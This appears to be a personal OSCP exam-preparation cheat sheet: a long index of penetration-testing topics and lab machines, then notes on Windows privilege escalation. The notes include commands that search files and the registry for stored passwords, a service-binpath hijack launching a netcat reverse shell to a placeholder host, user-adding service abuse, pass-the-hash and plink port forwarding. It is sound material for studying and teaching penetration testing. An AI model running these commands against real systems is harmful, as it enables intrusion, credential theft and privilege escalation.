Index

My OSCP Preparation Notes

  1. Scanning
    1. Recon
      1. network
      2. web
        1. gobuster
        2. wfuzz
        3. webdav
        4. jenkin
    2. Nmap
      1. My way
        1. TCP
          1. Step1-Live host
          2. Step2-nmap Full port scan
          3. Step3-Run nmap Full port scan
          4. Step4-nmap Open port scan
          5. Step5-Run Open port scan
        2. UDP
          1. Step2-nmap Full port scan
          2. Step3-Run nmap Full port scan
          3. Step4-nmap Open port scan
          4. Step5-Run Open port scan
        3. FinalScanPart1
        4. FinalScanPart2
    3. Port Knock
  2. Enumeration
    1. HTTP
      1. Gobuster
      2. Nikto
      3. dirsearch
      4. WFuzz
        1. wfuzz username
      5. Command Injection
      6. Login Bypass
      7. Droopal Scan
      8. SSRF
      9. Hydra post form
      10. cewl
    2. FTP-21
      1. Download file from ftp
      2. Autobind ftp when ftp is permission denied for local user
      3. Remeber while uploading file on ftp
    3. SSH
      1. SSH Tunneling / Pivoting
      2. enum_ssh
      3. rbash shell esacping
      4. Login with RSA
      5. Decrypt RSA
      6. When bruteforcing hydra don't work
      7. lshell bypass
      8. different shell and their errors
      9. port kncoking
    4. SMB
      1. Check smb version
    5. SNMP
      1. snmp_enum
      2. onesixyone scanning for ips
    6. MS SQL
      1. Microsoft_sql_enum
      2. Error based SQL
      3. boolean based
      4. Time based SQLi
      5. SQL Injection (SQL MAP)
      6. Blind sql
    7. finger_enum_user.sh
      1. Enum Image
    8. Telnet
    9. Pop3
    10. CMS
    11. Uncommon Port Exploitation search/Enum
    12. Steg extract
    13. RDP
    14. James 4555
    15. MDB tool
    16. OS
      1. linux
        1. commands
        2. tty
        3. basic enumeration
        4. suid
        5. cron
        6. grep
      2. windows
        1. basic commands
        2. samba version
        3. search
        4. version
  3. Shell
    1. msfvenom
      1. msf
    2. windows
    3. shell
    4. one liner
      1. php
      2. one liner
      3. infosec one liner
    5. powershell
    6. MSFVenom & Metasploit
      1. MSFVenom-payload
        1. Windows
        2. Linux
        3. Web Payload
        4. Binaries
      2. Metasploit
        1. meterpreter
        2. Meterpreter shell code
        3. MsfVenom Handler
      3. Netcat on windows
  4. Intrective shell
    1. Pseudo shell
      1. python
      2. bash
      3. awk
      4. perl
      5. ruby
      6. lua
      7. IRB
      8. tcpdump
      9. vi
      10. nmap
    2. Full intractive shell
      1. Magic on netcat
    3. Reverse shell
      1. bash
      2. python
      3. ruby
      4. Java
      5. Telnet
      6. netcat
      7. PHP
      8. Gawk
      9. URL reverseshell
      10. bypass & os command php
      11. curl
    4. Reverse Shell with Powercat
  5. File Transfer
    1. tftp
    2. http
    3. linux
    4. windows
    5. scp
    6. Transfer
      1. Windows
        1. Pwershell
        2. Cert Util
        3. TFTP
        4. SCP
        5. netcat
        6. Debug
        7. bitsadmin
        8. smb
        9. rdp
      2. Linux
        1. FTP
        2. TFTP
        3. SCP
        4. netcat
        5. curl
        6. Wget
        7. With no tool
  6. WINDOWS - Privilege Escalation
    1. WINDOWS - Sharup Results
    2. WINDOWS - Kernel
    3. WINDOWS - Services (Binpath)
    4. WINDOWS -Services (Unquoted path)
    5. WINDOWS - Services (Registry)
    6. WINDOWS - Registry (Autorun)
    7. WINDOWS - Registry(AlwaysInstallElevated
    8. WINDOWS - PasswordMining (Memory)
    9. WINDOWS -Password (Registry)
    10. WINDOWS - Password (config files)
    11. WINDOWS -Scheduled task (Missing binary)
    12. WINDOWS -Startup Application
    13. WINDOWS - Passthehash
    14. WINDOWS - Unquoted Path Service
      1. adding new user
      2. rdp and stickykeys
    15. WINDOWS - (AlwaysInstallElevated)
      1. 1st method - msfvenom
      2. 2nd method - administrator
      3. 3rd way via msf
    16. WINDOWS - Automated Script
      1. Windows-Exploit-suggester
      2. Windows Gather Applied Patches
      3. Sherlock
      4. JAWS – Just Another Windows (Enum) Script
      5. powerup
    17. My Priv esc tech (Windows)
      1. mimiketz if discover protected SID files
      2. Login with obtained creds with psexec and powershell & smbclient
      3. Finding permission & actual file path of shortcut file or .lnk file
      4. icacls & cacls for find file & folder permissions and Edit permission
      5. Discovered VM on target loaction
      6. Discoverd .mdb backup
      7. Discovered .kdbx Keepass database
      8. search file recursively
      9. List hidden files
      10. Got .dmp file extract with volatality
      11. group.xml file with enocded password
      12. Get that "pass" out of the ADS backup.zip
      13. disable firewall enable rdp
      14. Finding windows version from a file
      15. got SAM System file use pwdump to dump hashes
      16. Windows
        1. Ebowla + Token Impersonation
        2. Non intractive powershell file execution
        3. add user
        4. Convert Ptython2exe
        5. Manual Priv Check
        6. audit priv
  7. LINUX - Privilege Escalation
    1. LINUX - /etc/passwd -deeply
      1. openssl
      2. python
      3. perl
      4. mkpasswd
      5. php
    2. LINUX - Sudo -deeply
      1. Traditional Method to assign Root Privilege
      2. Default Method to assign Root Privilege
      3. find - Allow Root Privilege to Binary commands
      4. Allow Root Privilege to Binary Programs - Spawn shelll
        1. perl
        2. python
        3. less
        4. awk - spawn
        5. man
        6. vi
        7. Allow Root Privilege to Shell Script
        8. bash script - spawn
        9. python script - spawn
        10. c script - spawn
        11. Allow Sudo Right to other Programs
        12. Env
        13. ftp
        14. socat
        15. scp
    3. LINUX - SUID - NMAP
    4. LINUX - LD_Preload
    5. LINUX - SUID - vim-tiny
    6. LINUX -writable
      1. cron
    7. LINUX -CRON
      1. cron
    8. LINUX - Automated Script
      1. linenum
      2. Linuxprivchecker
      3. linuxexploitsuggester2
      4. Bashark
      5. beroot
    9. LINUX - capabilities capability
      1. caoability
    10. LINUX - Binaries for escalation
      1. zip
      2. wget
        1. passwd entry
      3. wget -2
      4. cat
      5. time
      6. Taskset
      7. git
      8. cp
      9. tmux
      10. tmux -2
      11. ed
      12. sed
      13. pip
      14. lxd
      15. socat
      16. scp
      17. capabilities
      18. perl
      19. docker
      20. perl -2
      21. tmp.py
      22. vi
      23. systemctl
      24. tar
      25. id-disk
      26. id-games
      27. python
      28. crontab
      29. tcpdump
      30. strace
      31. ssh
      32. make
      33. wine
      34. ftp
      35. micro
      36. mysql
      37. Simon
      38. tcpdump
      39. ht
      40. sls
      41. apt-get
      42. ed
      43. mawk
    11. LINUX - Exploiting SUDO CVE-2019-14287
  8. Buffer Overflow
    1. Minishare - Exploitation
    2. Brain Pan - Exploitation
  9. bruteforce
    1. ssh
    2. rdp
    3. ftp
    4. hashcat
    5. gpp-decrypt
    6. wp
    7. john
    8. hydra
    9. cewl and crunch
    10. medusa
    11. ncrack
    12. wfuzz
    13. fcrackzip
    14. keepass
    15. password Cracking
      1. zip
      2. NTLM
      3. /etc/shadow
      4. kbd keepass
      5. RSA Decrypting
      6. SHA512 $6$ shadow file
      7. MD5 $1$ shadow file
      8. john RAW MD5
      9. MD5 Apache webdav file $arp1$
      10. SHA1
      11. Auth Proxy
      12. WordPress (PHPASS) windows
      13. Crack MD5 windows
      14. $5$
      15. $krb5tgs$23$ Kerberos 5 hash
  10. compiling
  11. Tunneling
  12. Imp Tools

OSCP Practice (HTB & Vulnhub)

  1. HTB - linux
    1. tartarsauce
    2. nineveh
    3. haircut
    4. sunday
    5. poison
    6. swagshop
  2. HTB - windows
    1. legacy
    2. devel
    3. bastard
    4. optimum
    5. granny
    6. jeeves -juicypotato
    7. chatterbox
  3. HTB -ippsecc windows
    1. access
    2. active
    3. Arctic
    4. arkham
    5. bastard
    6. bastion
    7. blue
    8. bounty
    9. brainfuck
    10. chatterbox
    11. devel
    12. granny
    13. grandpa
    14. jeeves
    15. node
    16. kotarak
    17. lame
    18. legacy
    19. mantis
    20. netmon
    21. optimum
    22. querier
    23. secnotes
    24. oracle
  4. HTB -ippsecc linux
    1. Ariekei - docker
    2. Aragog - xxe
    3. Apocalyst - wp
    4. bank
    5. bart
    6. bashed
    7. beep
    8. bitlab
    9. blocky
    10. canape - db
    11. carrier
    12. chaos
    13. charon
    14. crimestoppers
    15. cronos
    16. curling
    17. dab - wfuzz
    18. DevOops
    19. Dropzone
    20. enterprise
    21. europa
    22. falafel
    23. flujab
    24. FluxCapacitor
    25. fortune - nfs
    26. FriendZone
    27. frolic - play
    28. haircut
    29. hawk
    30. haystack
    31. heist
    32. help
    33. irked
    34. jarvis
    35. lazy
    36. luke
    37. networked
    38. nibble
    39. nineveh
    40. zipper
    41. october
    42. onetwoseven
    43. oz
    44. poison
    45. popcorn
    46. sense
    47. shocker
    48. sneaky
    49. solidstate
    50. Stratosphere
    51. sunday
    52. swagshop
    53. tenten
    54. valentine
    55. waldo
    56. wall
    57. zetta
    58. teacher
    59. tatarsauce
    60. postman
  5. htbwithout msf - ranakhalil
    1. Bashed (linux)
    2. Devel (windows)
    3. Lame (linux)
    4. legacy (windows)
    5. Optimum (windows)
    6. Arctic (Windows)
    7. Shocker (linux)
    8. Valentine (linux)
    9. nibble (linux)
    10. cronos (linux)
    11. Blue (windows)
    12. Irked (linux)
    13. Friendzone (linux)
    14. brainfuck (linux)
    15. beep (linux)
    16. nineveh (linux)
    17. Active (Windows)
    18. sense (freebsd)
    19. solidstate (linux)
    20. node (linux)
    21. Poison (freebsd)
    22. Sunday (solaris)
    23. Swagshop (linux)
    24. Jarvis (linux)
    25. Networked (linux)
    26. TartarSauce (linux)
    27. LaCasaDePapel (linux)
    28. Hawk (linux) - drupal
    29. lightweight (linux)
    30. Devoops (linux)
    31. falafel (linux)
    32. kotarak (linux)
    33. bastard (windows)
    34. granny (windows)
    35. grandpa (windows)
    36. bounty (windows) gobuster - webconfig -juicy
    37. jerry (windows)
    38. chatterbox (windows)
    39. Sillo (windows)
    40. Conceal (Windows)
    41. Netmon (windows)
    42. jeeves (windows) jenkin
    43. bart (windows)
    44. tally (windows)
    45. jail
    46. safe
    47. bankrobber
  6. Vulnhub
    1. Bsides Vancouver
    2. raven 1
    3. raven 2
    4. acid 1
    5. violator
    6. troll 3
    7. pinkypalace v2
    8. pinkypalace v1
    9. digital world
      1. joy
      2. bravery
      3. mercy
      4. development
      5. torment
    10. skytower
    11. IMF
    12. troll1
    13. troll 2
    14. /dev/random sleepy
    15. BILLY MADISON
    16. wallabys-nightmare
    17. solidstate- james
    18. web developer - wp
    19. zico 1
    20. lin.security
    21. lord of the root - mysql udf
    22. pwnos 2.0
    23. sickos
    24. vulnos 2
    25. Mr. Robot 1
    26. stapler
    27. firstileaks
    28. kioptix 2014
    29. kioptix 1.3
    30. kioptix 1.2
    31. kioptix 1.1
    32. kioptix 1
    33. metasploitable 3
    34. metasplotiable 2
    35. metasploitable 1
  7. Vulnhub2
    1. sunset desk
    2. me and my gf 1
    3. sunset sunrise
    4. UA Literally vulnerable
    5. in plain sight 1
    6. HA: Dhanush
    7. HA: Chanakya
    8. djinn
    9. Jigsaw
    10. evm1
    11. mumbai 1
    12. gears-of-war-ep1
    13. chakravyuh
    14. ha-avengers-arsenal
    15. ha-naruto
    16. joker - joomla
    17. isro
    18. hackerfest
    19. bossplayersctf
    20. Misdirection
    21. armour
    22. ha-wordy- wordpress
    23. dc8
    24. silky
    25. sunset dawn
    26. sunset dawn
    27. Prime
    28. teuchter
    29. violator
    30. symfonos4
    31. dc-7 - drupal
    32. ai web 2
    33. hack 6 day
    34. digitalworld-localtorment
    35. hack-the-gemini-inc2
    36. dev-random-k2-vm-boot2root
    37. hack the gemini
    38. ai web 1
    39. hack-the-lin-security - mast
    40. oracle padding
    41. nezuko-1-vulnhub
    42. minu-v2
    43. digitalworld-local-joy
    44. symfonos2
    45. Matrix-3
    46. pumpkinraising
    47. symfonos1
    48. W1R3S.inc VM
    49. hack the de ice
    50. hack-kevgir
    51. vulnos-1
    52. dexter
    53. pwnlab
    54. sputnik-1 splunk
    55. dc1

Manual Priv Check


------------------------------------------------------
USE WMIC : To extract
processes,services,user accounts, user groups,
network interfaces,Hard drive information,, installed windows patch,
programs that run at startup,list of installed software,
Network share information, information about OS & timezones

tips: Based on OS version and Service Pack Look for respective KB patch
wmic qfe get Caption, Description, HotFixID, InstalledOn | findstr /C:"KB.." /C:"KB.."
-------------------------------------------------------

In Case of Mass rollout

>Things that left behind by Administrator used at installation process
>configuration files with sensetive info
> maybe pasword in plaintext or in Base64
sysprep.inf {clear text}, sysprep.xml {Base64 encoded}
Unattended.xml {Base64}

>Group policy {to create user on local domain} //Tools: Powersploit
Group.xml stored in SYSVOL {Password file, authenticated user can read it}
AES encrpted with static key publised on the msdn website
> similar policy services.xml,ScheduledTask.xml,Printer.xml,DataSource.xml may contain cPassword


----------------------------------------------------------
Strange Registry Setting:

> AlwaysInstallElevated with dWORD values of 1 {if enabled, allow *.msi instalation as NT/Authority}
reg query HKLM\SOFTWARE\policies\Microsoft\Windows\Installer\AlwaysInstalledElevated
reg query HKCU\SOFTWARE\policies\Microsoft\Windows\Installer\AlwaysInstalledElevated {Above and this DWORDvalue of 1}

>dir /s *pass* == *cred* == *vnc* == *.config* {search for files with any of this keyword}

>findstr /si password *.xml *.ini *.txt {grep password from fies with specific extention}

>req query HKLM /f password /t REG_SZ /s {grep password from registry}
>reg query HKCU /f password /t REG_SZ /s

-----------------------------------------------------------

Last look for Windows services & folder/file Permissions:
>findand use weak permission to escalate
Permission that can give a PE shell
****************************************************
SERVICE_CHANGE_CONFIG ---> Can reconfigure the service binary
WRITE_DAC ---. Can reconfigure permissions leading to SERVICE_CHANGE_CONFIG
WRITE_OWNER ---> can become OWNER, reconfigure permissions
GENERIC_WRITE ---> Inherit SERVICE_CHANGE_CONFIG
GENEIC_ALL ---> Inherit SERVICE_CHANGE_CONFIG
****************************************************
>Step 1: check access right with accesschk.exe {Microsoft Sysinternals Suite}

>Step 2: find services which we an reconfigure service parameters
sc qc Spooler {to cofigure manage window Services}
acesschk.exe -ucqv * {to ist all services}
acesschk.exe -ucqv <app name> {can see permission that user have}

>Note: generally low priv users belong to NT\Authenticated Users
Just in case check which group user belong Power Users if its not Authenticated USer

SO RESULTS {If user belong to NT\authenticated users group}
accesschk.exe -uwcqv "Authenticated Users" * {List big security fails for Windows XP SP0&SP1}
\\Resolved in Windows XP SP2 {In other XP SP can reconfigure and add code to get PE}

EX: sc qc upnhost {acesschk.exe -ucqv upnhost RW ACCESS}
THEN: sc config upnhost binpath="C:\nc.exe -nv x.x.x.x 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnhost obj="\.LocalSystem" passowrd=""
net start upnhost
----------------------------------------------------------------
File/Folder Permission: {If can't attack OS directly}

> Exploiting Weak folder privileges by using DLL hijacking
If have access to folder with dll then replace dll with own madeup dll and
when application try to invoke it will run our own dll
Application loads a DLL by its name and start searching for it
1.search begins from the directory application resides
2.if first fails the 32bit System direcorty C:\Windows\system32
3. 16bit C:\Windows\system
4.Windows directory C:\windows ***if have right access we win*****
5. Current working directory {CWD}
6. Directory in Environmental Paths

>>>>Now to get local PE access>>>following works & satisfy
Windows DLL search order
DLL hijacking vulnerabilty {Use process moniter and start stop SYSTEM Priv services {Windows service services.msc to start stop a serice}}
Weak Folder permissions
>start service > grep service name > check parameter in registry for service name > check invoked dlls
>> IDM disamble found dll and search for loaded DLL

Windows Service vulnerable on Windows 7 (32/64)
-----

IKE and AutIP IPsec keying modules (IKEEXT) --load dll wbssctrl.dll
Windows Media center reciever Services (ehRecvr) -- ehETW.dll
Windows Media Center Scheduler service (ehSched) -- ehETW.dll {Default Off}

schtasks.exe /run /I /TN ""


Second Special case of DLL Hijacking {Examine All the binpath of Windows services, scheduled tasks and Statup task}
-------


Note : running accesschk.exe for first time present with GUI EULA to byspas it run
accesschk.exe /accepteula ... ... ...


== Stored credentials ==

## Search for credentials within:
##Unattend credentials are stored in base64 and can be decoded manually with base64:
## user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=
dir c:\unattend.xml

## Metasploit Framework enum_unattend module and gather credentials module:
##

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb


##

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb



type c:\sysprep.inf
type c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

findstr /S pass *.txt *.xml *.ini // in C:\

#find out what groups a user is part of
net user <userName> /domain | find "Group"

== Windows Registry ==

VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

#is UAC enabled ?
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
EnableLUA REG_DWORD 0x0 // NO
EnableLUA REG_DWORD 0x1 // YES


SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Putty clear text proxy credentials:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Search the registry - copy (pipe) to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]

## Change the upnp service binary
sc qc upnphostsc config upnphost binpath= "net user /add"
sc config upnphost obj= ".\LocalSystem" password =""
net stop upnphost
net start upnphost

## copy all files in the remote directory to the local directory
mget * ##confirm with yes on all files . Maybe /y will help ?

## to copy multiple files from the local machine to the remote machine;
mput * ##confirm with yes on all files . Maybe /y will help ?


#Copy a file in cmd
copy FreeSSHDService.ini c:\"Program Files"\freeSSHd /y

#pass the hash Windows
pth-winexe -U username%hash //<target ip>
#after % starts the password
# aad3b435b51404eeaad3b435b51404ee: is the blnk LM hash


#Exec commands on remote Windows machine
PsExec.exe \\<target ip>

#get a file from Kali to the remote Windows machine
TFTP.EXE -i <target ip>

#remote port forwarding
#from Windows -> Kali
plink.exe -l root -pw Parolaroot -R 445:x.x.x.x:445

#Redirect port with plink.exe
plink -P 22 -l root -pw some_password -C -R 445:x.x.x.x:445 x.x.x.x

== SYSINTERNALS ==
## Use the tools in

https://github.com/crsftw/OSCP-cheat-sheet/tree/master/privesc/tools_win


## use the -accepteula to avoid the GUI asking to accept...EULA
## PsExec.exe –accepteula

PsExec64.exe -accepteula \\<target ip>
powershell -ExecutionPolicy Bypass C:\Users\Public\PsExec.exe -accepteula \\localhost -u user -p XXXX cmd

PsExec - execute processes remotely
PsFile - shows files opened remotely
PsGetSid - display the SID of a computer or a user
PsInfo - list information about a system
PsPing - measure network performance
PsKill - kill processes by name or process ID
PsList - list detailed information about processes
PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
PsLogList - dump event log records
PsPasswd - changes account passwords
PsService - view and control services
PsShutdown - shuts down and optionally reboots a computer
PsSuspend - suspends processes
PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)